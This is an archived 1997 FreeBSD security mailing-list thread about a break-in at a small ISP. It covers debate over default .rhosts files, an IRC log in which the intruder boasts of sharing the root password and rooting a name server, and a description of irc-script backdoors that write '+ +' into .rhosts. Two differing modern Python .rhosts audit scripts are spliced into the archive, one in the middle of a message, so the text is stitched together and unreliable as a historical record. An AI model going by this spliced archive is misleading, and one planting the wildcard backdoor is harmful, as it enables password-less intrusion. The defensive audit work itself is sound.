cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Vincent Poy wrote:

> You're right about that one. But wouldn't it still be possible to
> kill the init process?

Go for it.

/* Matthew N. Dodd              | A memory retaining a love you had for life
   winter@jurai.net             | As cruel as it seems nothing ever seems to
   http://www.jurai.net/~winter | go right - FLA M 3.1:53 */

From owner-freebsd-security Mon Jul 28 19:31:31 1997
Date: Mon, 28 Jul 1997 21:31:41 -0500 (CDT)
Message-Id: <199707290231.VAA03478@argon.vapornet.com>
From: John Preisler
To: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
References: <9758.870137085@orion.webspan.net>
X-Mailer: VM 6.22 under 19.15 XEmacs Lucid

I'm not convinced that FreeBSD installs a /root/.rhosts by default.
None of my boxes have it.

-jrp

From owner-freebsd-security Mon Jul 28 19:53:41 1997
Date: Mon, 28 Jul 1997 22:52:37 -0400 (EDT)
From: Brian Buchanan
To: Vincent Poy
cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, Vincent Poy wrote:

> =)> I know but when all the admins are remote, it has to be done
> =)> multiuser. Is there a way to push the secure level up to 2 and then push
> =)> it down when a make world is needed?
> =)
> =)It wouldn't be very secure then would it.
>
> You're right about that one. But wouldn't it still be possible to
> kill the init process?

That'll either take the system into single-user mode, cause it to reboot,
or cause it to halt. I forget which. No matter which of those happens, it
won't put the system back into multi-user with a lower securelevel,
assuming you have the kernel go secure at startup (which you should if you
intend to use securelevel).

From owner-freebsd-security Mon Jul 28 20:30:29 1997
Date: Mon, 28 Jul 1997 23:29:43 -0400 (EDT)
From: John Dowdal
To: Vincent Poy
cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

Forward this junk to abuse@erols.com, and try calling 703-321-8000, or
888-EROL-NET or 1-800-EROLS-PC [decreasing likeliness of helping]. If
you call, be extremely aggressive about getting to a higher-level person.
Consider mentioning severe legal problems if they fail to fence in the
hacker.

Keep in mind that you only have a .signature with the erols account, so it
may be bogus.

John

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Jordan K. Hubbard wrote:
>
> =)> Well, because I connect to the system using telnet ;) Also, this
> =)
> =)That proves absolutely nothing. You think I can't hack a telnetd to
> =)provide multiple "services?" Wake up, Vinnie! :-)
>
> Of course you could but you're not in the same type of hacking
> business this guy is in. This is a log of an irc chat session.
>
>
> >From johnnyu@accessus.net Mon Jul 28 17:01:43 1997
> Date: Mon, 28 Jul 1997 18:38:32 -0500 (CDT)
> From: NoHackMe!
> To: security@netcom.com
> Cc: vince@mcestate.com, mario1@primenet.com
> Subject: Logs (Gaianet.net)
>
> Here is a log I just got from talking with theca the hacker!
>
> Session Start: Mon Jul 28 18:16:14 1997
> [18:16] yeah
> [18:16] hi
> [18:16] wasup
> that was nice of you
> last night
> [18:16] what? pasting the root pass all over efnet?
> yea
> [18:16] so was icmp pinging me
> you shouldn't have hacked the machine
> [18:17] i was nice till that started
> aside from that the minor ping that you got was nothing
> you have created a HUGE DOS situation for the entire company
> [18:17] i'll show you all the pings i got
> [18:17] 1 sec.
> I don't care?
> [18:17] ok
> You were pinged
> why?
> [18:18] why am i causing a dos?
> [18:18] bring your machines back up
> well let's see you changed the root passwd
> handed it out
> [18:18] Jul 28 02:29:45 soma icmplog: ping from venus.GAIANET.NET
> [18:18] Jul 28 02:30:19 soma last message repeated 10 times
> [18:18] Jul 28 02:31:20 soma last message repeated 18 times
> [18:18] Jul 28 02:32:04 soma last message repeated 64 times
> [18:18] Jul 28 02:38:52 soma last message repeated 31 times
> [18:18] Jul 28 02:39:53 soma last message repeated 54 times
> [18:18] Jul 28 02:40:54 soma last message repeated 60 times
> [18:18] Jul 28 02:41:37 soma last message repeated 42 times
> [18:18] i changed the root passwd to 'root'
> someone changed the inetd.conf and rebooted
> [18:18] yeah
> [18:18] i didn't do that
> so now all the machines are pretty much denying all hosts
> we don't care too much
> [18:19] one of the windows lusers who saw my paste
> as far as we're concerned you're the cause of the problem
> [18:19] umm
> [18:19] why don't you fix the inetd.conf
> let's put it like this
> [18:19] instead of bitching about it
> that system is admin'd remotely
> that system is admin'd remotely
> [18:20] so NO one has physical access to the machine?
> your actions caused the main unix boxes on the lan
> not at the present time the owners are out of the country
> [18:20] so go drive over there or something and boot it up
> [18:20] i told you the root pass...
> anything I did to you was in an attempt to thwart your efforts to take control
> all of my feeble efforts failed
> you're a super leet spoof aren't you who's caching your dns
> [18:22] i'm caching it
> [18:22] on an authoritative ns box i rooted
> Hmm that's neat
> [18:23] yep
> That would explain why netcom security can't find you on the portmaster
> ________________________________________
> | TheCa (theca@wil-de7-10.ix.netcom.com)
> | name : No bodies ever knew...
> | serv : irc.pacbell.net
>
> [18:24] tell netcom to change the !root pass on some of their portmasters
> [18:24] just to be umm safe
> [18:25] netcom has no security...it's a joke
> that's good
> [18:25] netcom shell security is great
> [18:25] ppp security == null
> [18:26] they've got the biggest REAL isp (not including aol, etc)...you think they can keep track or even try to keep track of everyone?
> [18:26] they have well over half a million users
> you think they can find you?
> you think they can find you?
> Session Close: Mon Jul 28 18:32:07 1997
>
> [18:28] Jul 28 19:28:14 soma pppd[16376]: Modem hangup
> [18:28] Jul 28 19:28:14 soma pppd[16376]: Connection terminated.
> [18:28] Jul 28 19:28:14 soma pppd[16376]: Exit.
> [18:29] *clap clap*
> [18:29] nice
>
> [18:30] i'll see if that netcom acct is still up
> he probably doesn't have the account
> (!) The time is now 6:30pm.
> [18:30] something like "connect S0" or the port
> they just dumped the entire wilmington port
> [18:30] ah
> [18:30] heh
> [18:30] that's stupid
> [18:30] now there's no way they'll find me
> ________________________________________
> | TheCa_ (theca@phd-as15s15.erols.com)
>
> That's it John, basically he admits it and implies he has control over at
> least one of your portmasters and possibly one of your dns servers. This
> is a serious security issue for us and should be for you. If you have ANY
> contacts at erols.com please forward this to them and cc us if you would.
>
> John Urschel
> Gaianet Unix Administrator
>
>
>
> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET
> Unix Networking Operations - FreeBSD-Real Unix for Free
> GaiaNet Corporation - M & C Estate
> Beverly Hills, California USA 90210
> HongKong Stars/Gravis UltraSound Mailing Lists Admin
>
>

From owner-freebsd-security Mon Jul 28 20:41:43 1997
Date: Mon, 28 Jul 1997 20:41:32 -0700 (PDT)
From: Annelise Anderson
To: John Preisler
cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707290231.VAA03478@argon.vapornet.com>

On Mon, 28 Jul 1997, John Preisler wrote:

> I'm not convinced that FreeBSD installs a /root/.rhosts by default.
> None of my boxes have it.
>
> -jrp

Neither do mine.

Annelise

From owner-freebsd-security Mon Jul 28 21:10:12 1997
Date: Mon, 28 Jul 1997 22:09:50 -0600 (MDT)
Message-Id: <199707290409.WAA10250@rocky.mt.sri.com>
From: Nate Williams
To: Vincent Poy
Cc: "Jonathan A. Zdziarski", security@freebsd.org
Subject: Re: security hole in FreeBSD
X-Mailer: VM 6.29 under 19.15 XEmacs Lucid

Vincent Poy writes:

> Apparently FreeBSD ships with .rhosts in the root account.

Apparently you've yet to find a clue. Go rub yourself with clue juice,
and dance the clue dance, and maybe you'll get one.

Nate

From owner-freebsd-security Mon Jul 28 21:13:00 1997
Date: Mon, 28 Jul 1997 21:12:44 -0700 (PDT)
From: Vincent Poy
To: Nate Williams
cc: "Jonathan A. Zdziarski", security@freebsd.org, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707290409.WAA10250@rocky.mt.sri.com>

On Mon, 28 Jul 1997, Nate Williams wrote:

=)Vincent Poy writes:
=)> Apparently FreeBSD ships with .rhosts in the root account.
=)
=)Apparently you've yet to find a clue. Go rub yourself with clue juice,
=)and dance the clue dance, and maybe you'll get one.

Nothing is unhackable, and the hacker did say it was the .rhosts file
along with perl5.00401 that did it. Nothing is foolproof.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 21:16:24 1997
Date: Mon, 28 Jul 1997 21:16:12 -0700 (PDT)
From: Vincent Poy
To: John Preisler
cc: security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707290231.VAA03478@argon.vapornet.com>

On Mon, 28 Jul 1997, John Preisler wrote:

=)I'm not convinced that FreeBSD installs a /root/.rhosts by default.
=)None of my boxes have it.

It doesn't on 2.2.2R but it does on 2.1R installations.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 21:19:47 1997
Date: Mon, 28 Jul 1997 21:19:25 -0700 (PDT)
From: Vincent Poy
To: John Dowdal
cc: security@FreeBSD.ORG, JbHunt, "[Mario1-]"
Subject: Re: security hole in FreeBSD

On Mon, 28 Jul 1997, John Dowdal wrote:

=)Forward this junk to abuse@erols.com, and try calling 703-321-8000, or
=)888-EROL-NET or 1-800-EROLS-PC [decreasing likeliness of helping]. If
=)you call, be extremely aggressive about getting to a higher-level person.
=)Consider mentioning severe legal problems if they fail to fence in the
=)hacker.

I'll try but some of these ISPs take like 3 weeks to respond even if you
mention legal action. They don't think you can do anything to them because
they are out of state.

=)Keep in mind that you only have a .signature with the erols account, so it
=)may be bogus.

That's true too since we only know that is the ip number he is using for
his ppp session and it's non-static.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 21:28:01 1997
Date: Mon, 28 Jul 1997 21:27:48 -0700 (PDT)
From: Vincent Poy
To: security@FreeBSD.ORG
Subject: .rhosts file

I just checked and I made the wrong assumption of .rhosts in root for
2.2.2R or 2.2.1R but the machine installed from a 2.1.7R CD-ROM had it in
root with the following contents:

# This file should NOT be group or other readable.
#OtherMachine
#OtherMachine myFriend

The file is dated February 19, 1997.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET
Unix Networking Operations - FreeBSD-Real Unix for Free
GaiaNet Corporation - M & C Estate
Beverly Hills, California USA 90210
HongKong Stars/Gravis UltraSound Mailing Lists Admin

From owner-freebsd-security Mon Jul 28 21:35:32 1997
Date: Tue, 29 Jul 1997 07:34:20 +0300 (EEST)
Message-Id: <199707290434.HAA22497@katiska.clinet.fi>
From: Heikki Suonsivu
To: Vincent Poy
Cc: Gary Palmer, security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
References: <3749.870135741@orion.webspan.net>
Organization: Clinet Ltd, Espoo, Finland

Vincent Poy writes:

> Machines are offline already. The hacker confronted us and said
> that it was the default .rhosts file that came in the FreeBSD root account
> and he used perl5.00401 which had a security hole and then used rlogin to
> login to another machine without the password.

There is no default .rhosts file in FreeBSD, so the hacker is probably
trying to avoid telling you what was the real hole.

Just for reference, there are a large number of irc scripts which contain
backdoors (often well-disguised), which usually create a .rhosts file with
"+ +" in it. The easiest way is to trick someone on the machine to run one
of those scripts and it opens the machine, then use one of the FreeBSD
holes or local misconfigurations to open the rest.

> Cheers,
> Vince - vince@MCESTATE.COM - vince@GAIANET.NET
> Unix Networking Operations - FreeBSD-Real Unix for Free
> GaiaNet Corporation - M & C Estate
> Beverly Hills, California USA 90210
> HongKong Stars/Gravis UltraSound Mailing Lists Admin

--
Heikki Suonsivu, Täysikuu 10 C 83/02210 Espoo/FINLAND, hsu@clinet.fi
mobile +358-40-5519679 work +358-9-43542270 fax -4555276

From owner-freebsd-security Mon Jul 28 21:39:46 1997
X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs
Date: Mon, 28 Jul 1997 21:39:39 -0700 (PDT)
From: Jan Koum
X-Sender: jkb@shell6.ba.best.com
To: Annelise Anderson
cc: John Preisler, security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD

Well, yes and no.

Yes: FreeBSD installs dot.rhosts in /usr/share/skel where by default new
dot.files come from into user directories. Of course, most (some?) people
change the files in the directory or the default directory itself.

No: The file doesn't provide any security problems initially since it has
'#' at every line and therefore can't be used without further modification.

Maybe: There should be no dot.rhosts at all -- that might decrease the
amount of people using it and in return minimize headache to sys admins?
Then again, maybe not.

Almost positive: Shouldn't this thread be taken off line by now? From what
I have seen the break-in has not occurred due to a critical and/or unknown
bug in FreeBSD.

On Mon, 28 Jul 1997, Annelise Anderson wrote:

>
> On Mon, 28 Jul 1997, John Preisler wrote:
>
> > I'm not convinced that FreeBSD installs a /root/.rhosts by default.
> > None of my boxes have it.
> >
> > -jrp
>
> Neither do mine.
>
> Annelise
>

From owner-freebsd-security Mon Jul 28 21:50:05 1997
Date: Mon, 28 Jul 1997 21:49:50 -0700 (PDT)
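Heikki's warning about irc-script backdoors that drop a "+ +" .rhosts, and Jan's point that the skeleton file is inert because every line is a comment, both come down to what a given .rhosts actually grants. The audit below is an added example, not code from this thread or from FreeBSD: it assumes the rhosts(5) layout described in its docstring (the comment and wildcard conventions are assumptions, not taken from the thread) and runs on constructed sample files, with an optional scan of real home directories.

```python
"""Audit .rhosts files for the wildcard trust entries discussed in the thread.
Added example, not code from the thread or from FreeBSD/rlogind. Assumptions:
rhosts(5) layout of one "host [user]" per line, '#' starting a comment line,
'+' as a wildcard host or user, and a leading '-' denying instead of granting.
The sample files at the bottom are constructed for this example."""
import os
import stat
from dataclasses import dataclass, field

INERT, SAFE, RISKY, CRITICAL = "inert", "safe", "risky", "critical"
SEVERITY = {INERT: 0, SAFE: 1, RISKY: 2, CRITICAL: 3}


@dataclass
class Report:
    level: str = INERT
    findings: list = field(default_factory=list)

    def note(self, level, msg):          # record a finding, raise the level if worse
        self.findings.append(f"{level}: {msg}")
        if SEVERITY[level] > SEVERITY[self.level]:
            self.level = level


def parse_rhosts(text):
    """Return (host, user) pairs for each non-blank, non-comment line;
    user is None when only a host is given (same login name implied)."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def audit_rhosts(text, mode=None):
    """Classify one .rhosts file; mode is its st_mode when known."""
    rep = Report()
    for host, user in parse_rhosts(text):
        if host.startswith("-") or (user or "").startswith("-"):
            rep.note(SAFE, f"deny entry: {host} {user or ''}".rstrip())
        elif host == "+" and user in (None, "+"):
            who = "any user" if user == "+" else "the same login name"
            rep.note(CRITICAL, f"'+' host: {who} on any host gets in without a password")
        elif host == "+":
            rep.note(RISKY, f"user {user} is trusted from any host")
        elif user == "+":
            rep.note(RISKY, f"every user on {host} is trusted")
        else:
            rep.note(SAFE, f"explicit trust: {user or 'same login name'} from {host}")
    if rep.level == INERT:
        rep.note(INERT, "only comments or blank lines; the file grants nothing")
    if mode is not None:
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            rep.note(RISKY, "group/other writable: any local user could add a '+ +' line")
        elif mode & (stat.S_IRGRP | stat.S_IROTH) and rep.level != INERT:
            rep.note(RISKY, "group/other readable: the trusted-host list is exposed")
    return rep


def audit_path(path):
    """Audit an on-disk .rhosts file together with its permission bits."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        rep = Report()
        rep.note(RISKY, "not a regular file (symlink or special file)")
        return rep
    with open(path, encoding="ascii", errors="replace") as fh:
        return audit_rhosts(fh.read(), st.st_mode)


def scan_home_dirs(roots=("/root", "/home")):
    """Return {path: Report} for <root>/.rhosts and every <root>/<dir>/.rhosts."""
    reports = {}
    for root in roots:
        try:
            names = sorted(os.listdir(root))
        except OSError:                  # missing or unreadable directory
            continue
        candidates = [os.path.join(root, ".rhosts")]
        candidates += [os.path.join(root, n, ".rhosts") for n in names]
        for path in candidates:
            if os.path.lexists(path):
                reports[path] = audit_path(path)
    return reports


# Constructed samples; the first mirrors the all-comment skeleton quoted in the thread.
SKELETON = "# This file should NOT be group or other readable.\n#OtherMachine\n#OtherMachine myFriend\n"
BACKDOORED = "+ +\n"                     # what a trojaned irc script leaves behind
SCOPED = "mercury.example.com\nearth.example.com +\n-venus.example.com\n"

if __name__ == "__main__":
    for name, text in (("skeleton", SKELETON), ("backdoored", BACKDOORED), ("scoped", SCOPED)):
        rep = audit_rhosts(text, mode=0o600)
        print(f"{name}: {rep.level}")
        for finding in rep.findings:
            print("   ", finding)
    for path, rep in scan_home_dirs().items():    # live check of this host
        print(f"{path}: {rep.level}")
```

Run as root to cover /root and every home directory; a "critical" result on any account is the "+ +" case from Heikki's message.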
From: Vincent Poy To: Heikki Suonsivu cc: Gary Palmer , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <199707290434.HAA22497@katiska.clinet.fi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997, Heikki Suonsivu wrote: =) =)Vincent Poy writes: =) > Machines are offline already. The hacker confronted us and said =) > that it was the default .rhosts file that came in the FreeBSD root account =) > and he used perl5.00401 which had a security hole and then used rlogin to =) > login to another machine without the password. =) =)There is no default .rhosts file in FreeBSD, so the hacker is probably =)trying to avoid telling you what was the real hole. =) =)Just for reference, there are large number of irc scripts which contain =)backdoors (often well-disguised), which usually create .rhosts file with "+ =)+" in it. The easiest way is to trick someone in the machine to run one of =)those scripts and it opens the machine, then use one of the FreeBSD =)holes or local misconfigurations to open the rest. I might just have gotten carried away about the .rhosts thing. You're probably right about the .rhosts file because it's in my directory on this machine but not in the root directory and the contents are just: # This file should NOT be group or other readable. #OtherMachine #OtherMachine myFriend I haven't used irc like for a few years. The machine is a irc server though. Not the one he originally hacked but the one he hacked after he hacked the first one. 
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____
Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ]
GaiaNet Corporation - M & C Estate / / / / | / | __] ]
Beverly Hills, California USA 90210 / / / / / |/ / | __] ]
HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____]

From owner-freebsd-security Mon Jul 28 22:06:01 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA08873 for security-outgoing; Mon, 28 Jul 1997 22:06:01 -0700 (PDT)
Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA08861 for ; Mon, 28 Jul 1997 22:05:47 -0700 (PDT)
Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.6/8.6.9) with ESMTP id WAA06651; Mon, 28 Jul 1997 22:05:43 -0700 (PDT)
To: Vincent Poy
cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 17:03:19 PDT."
Date: Mon, 28 Jul 1997 22:05:43 -0700
Message-ID: <6647.870152743@time.cdrom.com>
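The .rhosts questions argued over above (whether the comment-only skeleton file grants anything, and the "+ +" wildcard that backdoored irc scripts drop into a home directory) can be checked mechanically. The Python below is an added example, not code from this thread or from FreeBSD; its three sample files are constructed, the first reproducing the comment-only file quoted above, and the example.org host names are placeholders.

```python
"""Audit rhosts-style trust files (.rhosts, /etc/hosts.equiv).

Added example. Flags the entries the thread worries about: the "+ +"
wildcard, host-only "+" entries, any live (non-comment) trust, and
permission bits that let group/other read or write the file.
"""
import os
import stat
from dataclasses import dataclass


@dataclass
class Finding:
    line_no: int      # 0 for file-level (permission) findings
    text: str         # the offending line, or a short description
    severity: str     # "critical", "warning" or "info"
    reason: str


SEVERITY_RANK = {"info": 1, "warning": 2, "critical": 3}


def parse_rhosts(text):
    """Yield (line_no, host, user, raw) for every live entry.

    Format as rlogind/rshd read it: one 'host [user]' pair per line, a line
    starting with '#' is a comment, '+' is a wildcard, a leading '-' denies,
    and '@name' names a netgroup."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        yield n, fields[0], (fields[1] if len(fields) > 1 else None), raw.rstrip()


def classify_entry(host, user):
    """Return (severity, reason) for one live host/user pair."""
    if host == "+" and user == "+":
        return "critical", "'+ +': any user from any host gets in without a password"
    if host == "+":
        return "critical", "'+' host: any host gets in with a matching user name"
    if host.startswith("-"):
        return "info", "deny entry; harmless, but confirm it is intentional"
    if user == "+":
        return "warning", f"any user on {host} gets in without a password"
    if host.startswith("+@") or (user or "").startswith("+@"):
        return "warning", "netgroup wildcard; trust depends on what the netgroup contains"
    who = user or "the same user name"
    return "info", f"password-less trust for {who} from {host}; verify it is intended"


def audit_text(text):
    """Audit file contents; an empty list means the file grants nothing."""
    return [Finding(n, raw, *classify_entry(host, user))
            for n, host, user, raw in parse_rhosts(text)]


def audit_mode(mode):
    """File-level finding when group/other can read or write the file, else None."""
    if not mode & (stat.S_IRWXG | stat.S_IRWXO):
        return None
    sev = "critical" if mode & (stat.S_IWGRP | stat.S_IWOTH) else "warning"
    return Finding(0, f"mode {stat.S_IMODE(mode):04o}", sev,
                   "file should be readable and writable by its owner only")


def worst_severity(findings):
    """Highest severity present, or None when there is nothing to report."""
    return max((f.severity for f in findings), key=SEVERITY_RANK.get, default=None)


def audit_file(path):
    """Audit a file on disk: permission bits first, then its entries."""
    with open(path, encoding="ascii", errors="replace") as fh:
        findings = audit_text(fh.read())
    perm = audit_mode(os.stat(path).st_mode)
    return ([perm] if perm else []) + findings


# Constructed sample 1: the comment-only skeleton file quoted in the thread.
SKELETON_RHOSTS = """\
# This file should NOT be group or other readable.
#OtherMachine
#OtherMachine myFriend
"""
# Constructed sample 2: what a backdoored irc script typically drops.
BACKDOOR_RHOSTS = "+ +\n"
# Constructed sample 3: one deliberate trust entry and one stray wildcard.
MIXED_RHOSTS = """\
# let the backup host in as the same user
backup.example.org
shell.example.org +
"""

if __name__ == "__main__":
    for name, text in [("skeleton", SKELETON_RHOSTS), ("backdoor", BACKDOOR_RHOSTS),
                       ("mixed", MIXED_RHOSTS)]:
        findings = audit_text(text)
        print(f"{name}: worst={worst_severity(findings)}")
        for f in findings:
            print(f"  line {f.line_no} [{f.severity}] {f.text!r}: {f.reason}")
```

Run over every ~user/.rhosts and /etc/hosts.equiv after a suspected compromise, and keep the list of files that returned any finding; the skeleton file returns none.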
From: "Jordan K. Hubbard"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> =)That proves absolutely nothing. You think I can't hack a telnetd to
> =)provide multiple "services?" Wake up, Vinnie! :-)
>
> Of course you could but you're not in the same type of hacking
> business this guy is in. This is a log of an irc chat session.

My essential point remains unchanged. You can trust NONE of the binaries on your system now and it's strongly suggested that you reinstall whatever you cannot, through mtree/tripwire database checks, verify as absolutely pristine. I also suggest that you guys invest in a CDR drive and use it for periodic construction of trusted backup images. For an ISP, the cost/benefit ratio is definitely there.

Jordan

From owner-freebsd-security Mon Jul 28 22:15:19 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA09699 for security-outgoing; Mon, 28 Jul 1997 22:15:19 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA09693 for ; Mon, 28 Jul 1997 22:15:16 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id WAA08350; Mon, 28 Jul 1997 22:15:04 -0700 (PDT)
Date: Mon, 28 Jul 1997 22:15:02 -0700 (PDT)
From: Vincent Poy
To: "Jordan K. Hubbard"
cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <6647.870152743@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Jordan K. Hubbard wrote:
=)> =)That proves absolutely nothing. You think I can't hack a telnetd to
=)> =)provide multiple "services?" Wake up, Vinnie! :-)
=)>
=)> Of course you could but you're not in the same type of hacking
=)> business this guy is in. This is a log of an irc chat session.
=)
=)My essential point remains unchanged. You can trust NONE of the
=)binaries on your system now and it's strongly suggested that you
=)reinstall whatever you cannot, through mtree/tripwire database checks,
=)verify as absolutely pristine. I also suggest that you guys invest in
=)a CDR drive and use it for periodic construction of trusted backup
=)images. For an ISP, the cost/benefit ratio is definitely there.

I know what you mean about the CDR drive. It's not that we had a choice since all of us are just volunteers running the system remotely. I'm planning to reinstall all the binaries anyways but it's kind of hard when I'm in Northern California and the owners are out of the country for 2-4 months leaving the machines in the closet totally unattended. I know /bin/sh and /bin/csh have been wiped so I need to be able to guide someone through how to use the floppy to copy the files back to the hd and then I'll fix it from there. Also, another thing is this ISP was free for the last 2 years until recently so maybe that's why the owners didn't put money into it but into other stuff instead.
Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 22:28:21 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA10626 for security-outgoing; Mon, 28 Jul 1997 22:28:21 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA10620 for ; Mon, 28 Jul 1997 22:28:19 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA21313; Tue, 29 Jul 1997 01:28:13 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA29455; Tue, 29 Jul 1997 01:28:13 -0400 (EDT)
To: Vincent Poy
cc: Nate Williams , "Jonathan A. Zdziarski" , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 21:12:44 PDT."
Date: Tue, 29 Jul 1997 01:28:13 -0400
Message-ID: <29452.870154093@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote in message ID :
> Nothing is unhackable. and the hacker did say it was the .rhosts
> file along with perl5.00401 that did it. Nothing is foolproof.

As evidenced by the fact you believe him. Questions that remain unanswered:

1) if he did use an .rhosts, how did the file get there?
2) I didn't know there was a setuid bug in perl 5.00401. What did he do to exploit perl?
3) Did you really talk to him on irc, or just some lamer pretending to have done the hack?

and most importantly:

4) did you LEARN from this experience? If not, *WHY* not?

Gary
--
Gary Palmer FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 22:29:20 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA10694 for security-outgoing; Mon, 28 Jul 1997 22:29:20 -0700 (PDT)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA10689 for ; Mon, 28 Jul 1997 22:29:18 -0700 (PDT)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id BAA21431; Tue, 29 Jul 1997 01:29:15 -0400 (EDT)
Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id BAA29487; Tue, 29 Jul 1997 01:29:15 -0400 (EDT)
To: Vincent Poy
cc: John Dowdal , security@FreeBSD.ORG, JbHunt , "[Mario1-]"
From: "Gary Palmer"
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 21:19:25 PDT."
Date: Tue, 29 Jul 1997 01:29:14 -0400
Message-ID: <29485.870154154@orion.webspan.net>
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote in message ID :
> I'll try but some of these ISPs take like 3 weeks to respond even
> if you mention legal action. They don't think you can do anything to them
> because they are out of state.

Don't mention legal action until the first round of complaints are not dealt with then ... simple.

Gary
--
Gary Palmer FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Mon Jul 28 22:35:06 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA11035 for security-outgoing; Mon, 28 Jul 1997 22:35:06 -0700 (PDT)
Received: from milehigh.denver.net (milehigh.denver.net [204.144.180.2]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA11029 for ; Mon, 28 Jul 1997 22:35:04 -0700 (PDT)
Received: from localhost (jdc@localhost) by milehigh.denver.net (8.8.5/8.8.5) with SMTP id XAA28459 for ; Mon, 28 Jul 1997 23:38:25 -0600 (MDT)
Date: Mon, 28 Jul 1997 23:38:24 -0600 (MDT)
From: John-David Childs
cc: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
In-Reply-To:
Message-ID:
